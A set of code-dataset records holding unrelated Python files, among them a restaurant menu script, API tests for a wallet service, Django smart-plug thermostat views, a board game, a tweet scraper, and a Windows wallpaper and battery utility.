Monday is 0 and Sunday is 6\ndia = datetime.date.today().weekday()\n# Available reservations from Monday to Sunday\nreservaciones = [80,100,80,100,80,100,100]\n# Menu for each day\nmenus = [[\"Hamburguesa\",\"Perro caliente\",\"Sandwich\"],\n [\"Salchipapa\", \"Burritos\"],\n [\"Burritos\",\"Hamburguesa\",\"Perro caliente\"],\n [\"Hamburguesa\",\"Perro caliente\",\"Sandwich\"],\n [\"Salchipapa\", \"Burritos\"],\n [\"Burritos\",\"Hamburguesa\",\"Perro caliente\"],\n [\"Hamburguesa\",\"Perro caliente\",\"Sandwich\"]]\nplus = [\"Papa francesa\",\"Aro de cebolla\",\"Nugguets\"]\nbebidas = [\"Gaseosa\",\"Jugo\",\"Leche\"]\ninventario = [[\"Hamburguesa 🍔\",100,8000],\n [\"Perro caliente🌭\",100, 9000],\n [\"Sandwich 🥪\",100, 5000],\n [\"Burritos 🌯\",100, 10000],\n [\"Papa francesa 🍟\",100, 10000],\n [\"Aro de cebolla 🍟\",100, 7000],\n [\"Nuggue 🍟🍟\",100, 4000]]\nclientes = []\nempleados = []\n # Menu\nwhile True:\n print(\"\\n========== Menu ==========\")\n print(\"[1] Ingresar Cliente 🧍🧍‍♀️\")\n print(\"[2] Ingresar Empleado 🚶\")\n print(\"[3] Mostrar clientes y empleados 👨‍👨‍👦‍👦\")\n print(\"[4] Pedir orden del dia 🍽🍔🍕🍟🌭\")\n print(\"[5] Pedir orden personalizada 🥪🧀\")\n print(\"[6] Inventario✅ \")\n print(\"[0] Salir\")\n opcion = input(\"Opcion: \")\n\n if opcion == \"1\":\n temp = []\n temp.append(input(\"Ingrese el nombre del cliente: \"))\n temp.append(input(\"Ingrese la cedula: \"))\n clientes.append(temp)\n \n if opcion == \"2\":\n temp = []\n temp.append(input(\"Ingrese el nombre del empleado: \"))\n temp.append(input(\"Ingrese la cedula: \"))\n 
empleados.append(temp)\n\n if opcion == \"3\":\n print(\"********** Clientes ***********\")\n for i in clientes:\n print(i[1],\" \",i[0])\n \n print(\"********** Empleados ***********\")\n for i in empleados: # was iterating over 'clientes', which printed the wrong list\n print(i[1],\" \",i[0])\n\n if opcion == \"4\":\n factura = []\n","sub_path":"RESTAURANTE.py","file_name":"RESTAURANTE.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"530188364","text":"import json\nimport time\nimport socket\n\nimport pytest\nimport requests\nfrom pytest_bdd import given, scenario, then, when\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\n\ndef requests_retry_session(\n retries=5,\n backoff_factor=0.3,\n status_forcelist=(500, 502, 504),\n session=None,\n):\n session = session or requests.Session()\n retry = Retry(\n total=retries,\n read=retries,\n connect=retries,\n backoff_factor=backoff_factor,\n status_forcelist=status_forcelist,\n )\n adapter = HTTPAdapter(max_retries=retry)\n session.mount(\"http://\", adapter)\n session.mount(\"https://\", adapter)\n return session\n\n\nhostname = socket.gethostname()\nip_address = socket.gethostbyname(hostname)\n\nFASTAPI_URL = \"http://localhost:8000\"\n\n\n@scenario(\"001_wallet.feature\", \"Getting a public DID\")\ndef test_get_public_did():\n # bdd test\n pass\n\n\n@given(\"I have an admin API key\")\ndef admin_header():\n admin_headers = {\"x-api-key\": \"adminApiKey\"}\n return admin_headers\n\n\n@given(\"I do not have an admin API key\")\ndef admin_header_no_key():\n admin_headers = {}\n return admin_headers\n\n\n@when(\"I target the create DID endpoint\")\ndef target_did_endpoint():\n return \"/wallets/create-pub-did\"\n\n\n@pytest.mark.asyncio\n@then(\"I am able to generate a public DID\")\ndef test_gen_pub_did():\n header = admin_header()\n endpoint = target_did_endpoint()\n url = FASTAPI_URL + endpoint\n\n s = requests.Session()\n s.headers.update(header)\n result = requests.get(url, headers=header)\n time.sleep(10)\n res_dict = json.loads(result.content)\n assert \"did_object\" in res_dict\n assert \"issuer_verkey\" in res_dict\n assert \"issuer_endpoint\" in res_dict\n\n\n@then(\"I am unable to generate a public DID\")\ndef test_gen_pub_did_no_key():\n header = admin_header_no_key()\n endpoint = target_did_endpoint()\n url = FASTAPI_URL + endpoint\n\n s = requests.Session()\n s.headers.update(header)\n result = requests_retry_session().get(url)\n res_dict = json.loads(result.content)\n assert result.status_code == 401\n assert \"Unauthorized\" in res_dict[\"detail\"]\n assert \"did_object\" not in res_dict\n assert \"issuer_verkey\" not in res_dict\n assert \"issuer_endpoint\" not in res_dict\n","sub_path":"app/tests/bdd/steps/test_001_wallet.py","file_name":"test_001_wallet.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"592154713","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.contrib.auth.models import User, Group\nfrom django.http import JsonResponse\nfrom getenv import env\nfrom rest_framework import viewsets\nfrom rest_framework.views import APIView\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework import status\nfrom rest_framework import generics\nfrom rest_framework.response import Response\nfrom 
rest_framework.decorators import api_view, detail_route\nimport requests\nimport subprocess\n\nfrom datetime import date\n\nfrom pyHS100 import SmartPlug\n\nfrom thermo.helpers.helpers import *\nfrom thermo.serializers import *\nfrom thermo.models import *\n\n# Create your views here.\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass SetupView(generics.ListCreateAPIView):\n queryset = Setup.objects.all()\n serializer_class = SetupSerializer\n\n def perform_create(self, serializer):\n serializer.save()\n\nclass SetupDetailView(viewsets.ModelViewSet):\n queryset = Setup.objects.all()\n serializer_class = SetupSerializer\n lookup_field=\"name\"\n\n @detail_route(methods=['put'])\n def update(self, request, name=None):\n setup = self.get_object()\n serializer = SetupSerializer(setup, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response({'status': True, 'name':setup.name, 'value': setup.value})\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass RoomsView(generics.ListCreateAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Rooms.objects.all()\n serializer_class = RoomsSerializer\n def perform_create(self, serializer):\n serializer.save()\n\n def list(request, *args, **kwargs):\n rooms = []\n for room in Rooms.objects.all():\n plugs_o = Plugs.objects.all().filter(room_id=room.id)\n plugs = []\n sensors = []\n for plug in plugs_o:\n plugs.append({\"id\":plug.id, 'ip':plug.ip, \"name\":plug.name, \"state\":plug.state})\n\n sensor_o = Sensors.objects.all().filter(room_id=room.id)\n for sensor in sensor_o:\n if env(\"DEBUG\") == True:\n data = {\"Temperature\": \"21\", \"Humidity\": \"56\"}\n else:\n data = requests.get('http://' + sensor.ip + '/data').json()\n\n sensors.append({'id': sensor.id, 'name': sensor.name, 'ip': sensor.ip ,'temperature': data['Temperature'], 'humidity': data['Humidity']})\n rooms.append({'id': room.id, 'name': room.name, 'plugs': plugs, 'sensors':sensors})\n return Response(rooms)\n\n\nclass RoomsDetailView(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Rooms.objects.all()\n serializer_class = RoomsSerializer\n\nclass PlugsView(generics.ListCreateAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Plugs.objects.all()\n serializer_class = PlugsSerializer\n\n def perform_create(self, serializer):\n serializer.save()\n\nclass PlugsDetailView(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Plugs.objects.all()\n serializer_class = PlugsSerializer\n\n @detail_route(methods=['put'])\n def update(self, request, pk=None):\n plug = self.get_object()\n\n serializer = PlugsSerializer(plug, data=request.data, partial=True)\n if serializer.is_valid():\n try:\n smplug = SmartPlug(request.data['ip'])\n if(request.data['state'] == '1' or request.data['state'] == True):\n print(\"test\")\n smplug.turn_on()\n else:\n print(\"test2\")\n smplug.turn_off()\n print(serializer.save())\n except:\n return 
Response({'error': 'Une erreur s\\'est produite'})\n return Response({'status': 'state set'})\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass SensorsView(generics.ListCreateAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Sensors.objects.all()\n serializer_class = SensorsSerializer\n\n def perform_create(self, serializer):\n serializer.save()\n\n def list(request, *args, **kwargs):\n sensors = []\n for sensor in Sensors.objects.all():\n if env(\"DEBUG\") == True:\n data = {\"Temperature\": \"21\", \"Humidity\": \"56\"}\n else:\n data = requests.get('http://' + sensor.ip + '/data').json()\n\n sensors.append({'id':sensor.id, 'name': sensor.name, 'temperature':data['Temperature'], 'humidity':data['Humidity']})\n return Response(sensors)\n\nclass SensorsDetailView(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Sensors.objects.all()\n serializer_class = SensorsSerializer\n\nclass LogsSensorsView(generics.ListCreateAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = LogsSensors.objects.all()\n serializer_class = LogsSensorsSerializer\n\n def perform_create(self, serializer):\n serializer.save()\n\nclass LogsSensorsDetailView(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = LogsSensors.objects.all()\n serializer_class = LogsSensorsSerializer\n\nclass LogsPlugsView(generics.ListCreateAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = LogsPlugs.objects.all()\n serializer_class = LogsPlugsSerializer\n\n def perform_create(self, serializer):\n serializer.save()\n\nclass LogsPlugsDetailView(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = LogsPlugs.objects.all()\n serializer_class = LogsPlugsSerializer\n\nclass CheckPresenceView(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None):\n content = {\n 'user': unicode(request.user), # `django.contrib.auth.User` instance.\n 'auth': unicode(request.auth), # None\n }\n p = subprocess.Popen(\n \"ping -c1 -W1 iphone-de-sebastien.local | grep -o -E '[0-9]{0,3}\\.[0-9]{0,3}\\.[0-9]{0,3}'\",\n stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n p_status = p.wait()\n\n output = output.replace(\"\\n\", \"\")\n if output:\n\n return Response(output)\n else:\n return Response(err)\n\nclass CheckDataView(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None):\n sensors = {}\n plugs = {}\n response = {}\n response['sensors'] = {}\n for sensor in Sensors.objects.all():\n if env(\"DEBUG\") == True:\n sensors[sensor.name] = {\"Temperature\": \"21\", \"Humidity\": \"56\"}\n else:\n sensors[sensor.name] = requests.get('http://' + sensor.ip + '/data').json()\n\n logsSensors = LogsSensors()\n logsSensors.temperature = sensors[sensor.name].get('Temperature')\n logsSensors.humidity = sensors[sensor.name].get('Humidity')\n logsSensors.sensor = sensor\n logsSensors.save()\n\n logsPlugs = LogsPlugs()\n plugs = Plugs.objects.all().filter(room_id=sensor.room.id)\n\n BoolInterval = False\n\n for ti in 
TimeInterval.objects.all().filter(room_id=sensor.room.id):\n\n if(isInTimeInterval(ti.startingTime, ti.endingTime)):\n BoolInterval = True\n\n presenceBool = True if sensors[sensor.name].get('Presence')==\"1\" else False #isPresent('iphone-de-sebastien.local')\n\n logPresence = LogsPresence()\n if presenceBool:\n logPresence.presence = 1\n logPresence.save()\n\n print(\"Presence:\"+str(presenceBool))\n condition = (isSetupTrue(\"ForceStop\") != True and presenceBool and BoolInterval == False) or (\n ((not presenceBool) or BoolInterval) and int(sensors[sensor.name]['Temperature']) < int(Setup.objects.get(name__iexact=\"MinTemperature\").value))\n\n print(\"condition1: \" + str((isSetupTrue(\"ForceStop\") != True and presenceBool and BoolInterval == False)))\n print(\"__\")\n print(\"condition2 : \" + str(((not presenceBool) or BoolInterval) and int(sensors[sensor.name]['Temperature']) < int(Setup.objects.get(name__iexact=\"MinTemperature\").value)))\n\n\n if condition:\n if presenceBool and (BoolInterval == False):\n askedTemperature = Setup.objects.get(name__iexact=\"Temperature\").value\n else:\n askedTemperature = Setup.objects.get(name__iexact=\"MinTemperature\").value\n\n print(askedTemperature)\n #print(sensors[sensor.name]['Temperature'])\n if int(sensors[sensor.name]['Temperature']) < int(askedTemperature) + 1:\n response['success'] = True\n response['sensors'][sensor.name] = {'state': \"on\"}\n logsPlugs.value = 1\n for plug in plugs:\n if(condition == True):\n print(\"ON \" + plug.ip)\n plug.state = True\n smplug = SmartPlug(plug.ip)\n smplug.turn_on()\n elif int(sensors[sensor.name]['Temperature']) >= int(askedTemperature) - 1:\n response['success'] = True\n response['sensors'][sensor.name] = {'state': \"off\"}\n logsPlugs.value = 0\n for plug in plugs:\n print(\"Off \" + plug.ip)\n plug.state = False\n smplug = SmartPlug(plug.ip)\n smplug.turn_off()\n else:\n logsPlugs.value = 0\n else:\n logsPlugs.value = 0\n for plug in plugs:\n smplug = SmartPlug(plug.ip)\n plug.state = False\n smplug.turn_off()\n\n logsPlugs.save()\n plug.save()\n return JsonResponse(response)\n","sub_path":"thermo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"290538976","text":"# Mensch Ärgere Dich Nicht!\n# created on 17.11.2020 by Lerngruppe-Fuerchterlich\n\nimport random\nimport time\nimport colorama\ncolorama.init()\n\n# What works:\n# - Game board loop\n# - Any number of players\n# - (simple) board display\n# - Kicking out opposing pieces\n# - 3 tries when no piece is on the board\n\n# Limitations:\n# - Ordering inside the finish area is ignored\n# - When the start field has to be cleared, two pieces can end up on one field (see TODO)\n\nclass MenschAergereDichNicht:\n # Class attribute\n version = \"1.0\"\n\n # Game\n def __init__(self, number_of_players):\n # instance attribute\n self.number_of_players = number_of_players\n self.game_size = number_of_players * 10\n self.players = []\n self.game_over = False\n \n print(\"starting...\", self.number_of_players, \"Players\")\n\n # init gamefield display\n self.gamefield = Gamefield(self)\n\n for p in range(self.number_of_players):\n self.players.append(Player(self, p*10, p))\n\n # Main Game Loop\n while True:\n for player in self.players:\n # show gamefield before every turn\n self.gamefield.show(self.players)\n\n print(\"\")\n print(\"Player\", player.id+1, \"Turn\")\n\n player.turn()\n\n if player.has_won():\n print(\"Game 
Over\")\n print(\"Player\", player.id+1, \"has won\")\n return\n\n\nclass Player:\n def __init__(self, parent, offset, id):\n self.parent = parent\n self.offset = offset\n self.name = \"Player \" + str(id)\n self.pieces = []\n self.id = id\n\n # Every player owns 4 pieces\n for _ in range(0,4):\n self.pieces.append(Piece(self))\n\n # true if one (or more) pieces is on the board\n def has_piece_outside(self):\n result = False\n for piece in self.pieces:\n if piece.position != -1 and piece.position < self.parent.game_size:\n result = True\n return result\n \n # seperate function needed, true if one (or more) pieces is in start\n def has_piece_inside(self):\n result = False\n for piece in self.pieces:\n if piece.position == -1:\n result = True\n return result\n\n # returns REAL (gamefield) positions of all 4 pieces (with offset)\n def get_piece_positions_offset(self):\n positions = []\n for piece in self.pieces:\n # old:\n # positions.append(piece.get_realposition())\n positions.append(self.calculate_realposition(piece))\n return positions\n\n # move piece from start area to board\n def place_piece_outside(self):\n for piece in self.pieces:\n if piece.position == -1:\n # kick other players from the start point\n if self.is_field_free(self.offset):\n piece.position = 0\n return\n print(\"ERROR: player has no piece in start area\")\n\n # Returns the piece object on starting point of current player\n def get_piece_on_start(self):\n for piece in self.pieces:\n if piece.position == 0:\n return piece\n return False\n\n # true if all pieces are in finish, expansion possible\n def has_won(self):\n won = True\n for piece in self.pieces:\n if piece.position < self.parent.game_size:\n won = False\n return won\n\n # main function, gets called every turn\n def turn(self):\n # Positions\n #print(\"Player\", self.id+1, \"Positions:\", self.get_piece_positions())\n # Real Positions\n print(\"Player\", self.id+1, \"Positions:\", self.get_piece_positions_offset())\n\n piece_on_start = self.get_piece_on_start()\n\n # is the player allowed to throw the dice 3 times?\n if self.has_piece_outside():\n # normal game\n dice = self.roll_dice()\n\n # Special Cases when a 6 is thrown:\n if dice == 6:\n # bonus roll\n next_dice = self.roll_dice()\n\n if self.has_piece_inside():\n if not piece_on_start:\n i = input(\"Move Piece from home to board? (y/n)\")\n if i != \"n\":\n # the first dice (6) will get used to place the piece\n self.place_piece_outside()\n piece_on_start = self.get_piece_on_start()\n if self.has_piece_inside():\n # has to move from start\n # TODO: check for kick and own pieces!\n piece_on_start.go_forward(next_dice)\n else:\n self.move_freely(next_dice)\n else:\n # the first dice (6) can be used to walk\n self.move_freely(dice)\n self.move_freely(next_dice)\n else:\n # has to move from start, TODO check for kick and own pieces\n piece_on_start.go_forward(next_dice)\n else:\n # player cant use the dice to get out of start anyways\n self.move_freely(dice)\n self.move_freely(next_dice)\n\n if next_dice == 6:\n # repeat if the next throw was another 6\n self.turn()\n else:\n # normal gameplay\n self.move_freely(dice)\n else:\n # roll 3 times to get out of start\n for i in range(0, 3):\n print(\"Roll\", i+1)\n dice = self.roll_dice()\n if dice == 6:\n next_dice = self.roll_dice()\n self.place_piece_outside()\n # TODO: check for kick and own pieces!\n self.get_piece_on_start().go_forward(next_dice)\n if next_dice == 6:\n self.turn()\n break\n\n # player can (freely) select which piece to move (i.e. 
doesn't need to move from start)\n def move_freely(self, dice):\n i = int(input(\"Select Piece: \"))\n pos_real = self.calculate_realposition(self.pieces[i-1])\n newpos_real = self.calculate_realposition(self.pieces[i-1], dice)\n\n if pos_real != \"Start\" and pos_real != \"Finish\" and newpos_real != \"Outside\" :\n if self.is_field_free(newpos_real):\n self.pieces[i-1].go_forward(dice)\n else:\n # You cannot kick out your own piece and have to pick another one.\n # TODO: what if that is not possible..?\n pass\n else:\n print(\"Can't move this piece\")\n self.move_freely(dice)\n\n # Returns number between 1 and 6\n def roll_dice(self):\n dice = random.randint(1, 6)\n print(\"Rolling dice:\", dice)\n return dice\n\n # check if field is free and kick other players if needed\n def is_field_free(self, realposition):\n free = True\n\n for player in self.parent.players:\n if player.id != self.id: # check for other player pieces\n for piece in player.pieces:\n if piece.position < self.parent.game_size and piece.position != -1 and self.calculate_realposition(piece) == realposition:\n print(\"kicking piece on position\", realposition, \" owner: player\", player.id+1)\n piece.position = -1\n else: # check for own pieces\n for piece in player.pieces:\n if self.calculate_realposition(piece) == realposition and self.calculate_realposition(piece) != \"Finish\": # and realposition is inside finish\n print(\"Field is not free or outside the board\")\n free = False\n return free\n\n # returns the real position of a piece. use dice to check future positions, leave blank to use default 0 (current position)\n def calculate_realposition(self, piece, dice=0):\n position = piece.position + dice\n boardsize = self.parent.game_size\n\n # Preparation for finish-sorting\n # Check for start/finish\n #if boardsize <= position <= boardsize+3:\n # return \"Finish\"\n #if position > boardsize+3:\n # return \"Outside\"\n\n # atm no check in finish\n if boardsize <= position:\n return \"Finish\"\n if position == -1:\n return \"Start\"\n\n\n # offset-calculation-wrap-around-magic - do not touch\n if piece.parent.offset != 0:\n if position >= (boardsize-piece.parent.offset):\n return position - (boardsize-piece.parent.offset)\n else:\n return position + piece.parent.offset\n else:\n return position\n\n # preparation for custom player names\n def set_name(self, name):\n self.name = name\n\n\nclass Piece:\n def __init__(self, parent):\n self.parent = parent\n self.position = -1\n\n # move piece, do not call directly, use player-functions as wrapper to handle kicking etc\n def go_forward(self, distance):\n print(\"Moving piece from\", self.position, \"to\", self.position + distance)\n self.position = self.position + distance\n print(\"Real new position:\", self.parent.calculate_realposition(self))\n\n\nclass Gamefield:\n def __init__(self, parent):\n self.parent = parent\n self.size = self.parent.game_size\n self.color = [colorama.Fore.RED, colorama.Fore.GREEN, colorama.Fore.YELLOW, colorama.Fore.BLUE, colorama.Fore.MAGENTA, colorama.Fore.CYAN, colorama.Back.RED, colorama.Back.GREEN, colorama.Back.YELLOW, colorama.Back.BLUE, colorama.Back.MAGENTA, colorama.Back.CYAN, colorama.Back.WHITE]\n self.color_reset = colorama.Fore.RESET + colorama.Back.RESET\n \n # Output a simple board\n def show(self, players):\n # check for pieces in finish\n print (\"Finish: \", end='')\n for player_index, player in enumerate(players):\n for piece_index, piece in enumerate(player.pieces):\n if \"Finish\" == 
player.calculate_realposition(piece):\n print(self.color[player_index] + str(piece_index+1) + self.color_reset, end='')\n # newline\n print(\"\")\n\n # show board from end to start (descending)\n for i in reversed(range(0, self.size)):\n # add space for single digits\n if i < 10:\n print(\" \", end='')\n\n print (str(i) + \": \", end='')\n\n # show pieces in player colors\n for player_index, player in enumerate(players):\n for piece_index, piece in enumerate(player.pieces):\n if i == player.calculate_realposition(piece):\n print(self.color[player_index] + str(piece_index+1) + self.color_reset, end='')\n\n # show start/finish locations in player colors\n for player_index, player in enumerate(players):\n if i == player.offset:\n print(self.color[player_index] + \" (Start/Finish Player \" + str(player_index+1) + \")\" + self.color_reset, end='')\n\n #newline\n print(\"\")\n\n\nif __name__ == \"__main__\":\n # Start the game\n game = MenschAergereDichNicht(3)\n print(\"Version\", game.version)\n","sub_path":"mensch.py","file_name":"mensch.py","file_ext":"py","file_size_in_byte":11582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"362456022","text":"\"\"\"Script made to gather tweets and store them in a CSV file.\"\"\"\nimport sys\nimport os\nimport logging\nimport argparse\nfrom argparse import RawTextHelpFormatter\nfrom tweets_handler import ApiHandler\nfrom csv_handler import CSVFileHandler\nfrom utils import validate_args\n\n\ndef main(args):\n \"\"\"Main entry point for the script.\"\"\"\n logging.info('Starting script'.format(args.query_word))\n logging.debug('Input parameters: \\'{}\\', \\'{}\\', \\'{}\\''\n .format(args.search_type, args.query_word, args.out_dir))\n if validate_args(args):\n api_handler = ApiHandler(args.query_word, args.search_type)\n tweets = api_handler.get_tweets()\n csv_handler = CSVFileHandler(args, tweets)\n csv_handler.export_csv()\n else:\n logging.info('Script stopped')\n\n\ndef get_parser():\n \"\"\"Defines the parser object for argparse.\"\"\"\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=RawTextHelpFormatter)\n parser.add_argument('search_type', metavar='search_type', type=str,\n choices=['by-keyword', 'by-user'],\n help='Specifies the type of search to be performed.\\n'\n + 'Values accepted:\\n'\n + '-\\'by-keyword\\'\\n'\n + '-\\'by-user\\'\\n')\n parser.add_argument('query_word', metavar='query_word', type=str,\n help='A keyword or a username to be used in the search.')\n parser.add_argument('out_dir', metavar='out_dir', type=str,\n help='Directory where the CSV file will be saved.')\n parser.add_argument('-v', '--verbose', dest='verbose', action='store_true',\n help='Increases log verbosity.')\n return parser\n\n\nif __name__ == '__main__':\n parser = get_parser()\n args = parser.parse_args()\n logging_level = logging.INFO\n if args.verbose:\n logging_level = logging.DEBUG\n logging.basicConfig(level=logging_level,\n format='%(asctime)-15s %(message)s')\n main(args)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"470636557","text":"class Solution:\n # @param A : string\n # @return a strings\n def simplifyPath(self, A):\n split_A = A.split('/')\n # split_A = split_A[1:-1]\n stack = []\n for val in split_A:\n if val == '.' 
or val == '':\n continue\n elif val == '..':\n if len(stack) > 0:\n stack.pop()\n else:\n stack.append(val)\n result = \"/\"\n # print(stack)\n for i in range(len(stack)):\n result += stack[i]\n if i != len(stack) - 1:\n result += '/'\n return result\n\n\n# Alternative stand-alone implementation of the same logic (the stray 'self' parameter has been dropped):\ndef simplifyPath(A):\n st = []\n A = [x for x in A.split('/') if x != '']\n for d in A:\n if d == '..':\n if st != []:\n st.pop()\n elif d != '.':\n st.append(d)\n return '/' + '/'.join(st) \n","sub_path":"interviewbit/simplify_directory_path.py","file_name":"simplify_directory_path.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"208803869","text":"'''\nAuthor: Sharath Sunil\nGitHub: https://github.com/Anonymous1846\nCopyright: 2021\nLanguage: Python\n\nA simple Python program/script which monitors the battery status in parallel, and changes the background wallpaper at an interval of 2 minutes !\n'''\nfrom shutil import copyfile\nfrom time import sleep\nfrom plyer import notification\nimport schedule\nimport random\nimport psutil\nimport ctypes\nimport sys\nimport os\n\nsys.setrecursionlimit(10**6) #recursion limit set to 10^6 otherwise error will pop up !\n'''\nThe currently logged in user is obtained, then we locate his/her startup directory and check if the file is already there; if not,\nthen we copy the file from the current location to the startup directory.\nThe pictures are loaded from the camera roll directory of the currently logged in user !\n'''\ncurrent_user=os.getlogin() #the currently logged in user name\nexe_path=f'C:\\\\Users\\\\{current_user}\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\PCUtility Tool.pyw'\nPIC_DIRECTORY=f'C:\\\\Users\\\\{current_user}\\\\Pictures\\\\Camera Roll' #the directory where the photos are stored; it can be changed !\nEXTS=['jpg','jpeg','png']\nPICS=[picture for picture in os.listdir(PIC_DIRECTORY) if any(picture.endswith(extension) for extension in EXTS)] #filtering out only the pictures with png, jpg, and jpeg !\n\nif not os.path.isfile(exe_path):\n\tcopyfile('./PCUtility Tool.pyw',exe_path) #if it is not in the startup folder then copy it to the startup folder !\n\n'''\nThe helper function that randomly chooses an image for the background; the image is set using the ctypes interface to the\nSystemParametersInfoW function. The dir is the camera roll directory; to change to the directory of your choice, please\nchange the variable PIC_DIRECTORY !\n\nreturn: None\n\nparams: None\n'''\ndef _change_wallpaper():\n\twallpaper=random.choice(PICS)#a random pic is chosen from the list !\n\tctypes.windll.user32.SystemParametersInfoW(20, 0,os.path.join(PIC_DIRECTORY,wallpaper), 0) #the path to the wallpaper provided in the third parameter !\n\n'''\nThe function which actually makes a call to the above function, here the _change_wallpaper function is called at an interval of 2 mins.\nWe can change the interval to our liking !\n\nreturn: None\n\nparams: None\n'''\ndef change_wallpaper():\n\tschedule.every(2).minutes.do(_change_wallpaper) #schedule the helper every 2 minutes (scheduling change_wallpaper itself caused unbounded recursion)\n\twhile True:\n\t\tschedule.run_pending()\n\t\tsleep(1)\n\n\n'''\nThe battery information is retrieved by the python module named psutil, which is a cross platform utility\nused for getting the process/services information of the OSes. 
The basic idea of the function is to warn the user\nto charge the laptop, when the battery percentage is less than 25 and remove the charger if the battery % is\ngreater than 95%\n\nParams:None\n\nReturn:None\n'''\ndef _check_battery_status():\n\tbattery_info=psutil.sensors_battery()\n\tbattery_percentage = battery_info.percent #grabbing the battery percent\n\tis_plugged_in = battery_info.power_plugged # grabbing the info whether the battery is is_plugged_in or not !\n\tif is_plugged_in and float(battery_percentage) > 95.00:\n\t\tnotification.notify(\"PC Util v1.0\", \"Please Remove The Charging Cable, The Battery is 95%+ !\", timeout = 10)\n\telif not is_plugged_in and float(battery_percentage) < 25.00:\n\t\tnotification.notify(\"PC Util v1.0\", \"Please Plug In The Charger, Your Battery Is Less Than 25% !\", timeout = 10)\n\n\n'''\nThis function will call the above function in an interval of 30 secs, so that it can check the status at each iteration\n\nparams: None\n\nReturn: None\n\n'''\ndef check_battery_status():\n\tschedule.every(30).seconds.do(_check_battery_status)\n\twhile 1:\n\t\tschedule.run_pending()\n\t\tsleep(1)\n'''\nThe function will execute the battery check and the wallpaper change at intervals of 30 secs and 2 mins respectively !\n\nParams: None\n\nReturn:None\n'''\n\ndef do_tasks():\n\tschedule.every(30).seconds.do(_check_battery_status)\n\tschedule.every(2).minutes.do(_change_wallpaper)\n\twhile True:\n\t\tschedule.run_pending()\n\t\tsleep(1)\n\ndo_tasks() # function to execute the scheduled tasks \n","sub_path":"PCUtility Tool/PCUtility Tool.py","file_name":"PCUtility Tool.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577089708","text":"import copy\nimport heapq\nfrom math import fabs, log\n\nfrom PIL import Image\n\n\n# encapsulates data that helps build the pixel array into a graph of valid directed paths\n# with edge weights corresponding to energies of pixels\nclass Edge:\n def __init__(self, source, sink, weight):\n self.source = source\n self.sink = sink\n self.weight = weight\n\n\n def __lt__(self, other): # Python 3's heapq orders items via '<'; the original __cmp__ is Python 2 only\n return self.weight < other.weight\n\n\n def __str__(self):\n return \"[%s]\" % str(self.weight)\n\n\ndef seam_dijk(image):\n heap = TestHeap() # NOTE: TestHeap is not defined or imported in this file\n path = []\n dic = {}\n prev = {}\n\n def get_path(node):\n path.append(prev[node])\n if prev[node] is None:\n return\n else:\n get_path(prev[node].pos)\n\n for pix in image.top_horz_row():\n heap.add(Edge(None, pix, pix.energy))\n dic[pix.pos] = pix.energy\n prev[pix.pos] = None\n\n while True:\n edge = heap.get_top()\n neighbors = []\n\n if (edge.sink.pos[1] == (image.height-1)):\n path.append(edge.sink)\n get_path(edge.sink.pos)\n return [p.pos for p in path[:-1]]\n else:\n neighbors.append(\n image.pixels[(edge.sink.pos[0], (edge.sink.pos[1]+1))])\n if edge.sink.pos[0] == (image.width-1):\n neighbors.append(\n image.pixels[((edge.sink.pos[0]-1), (edge.sink.pos[1]+1))])\n\n elif 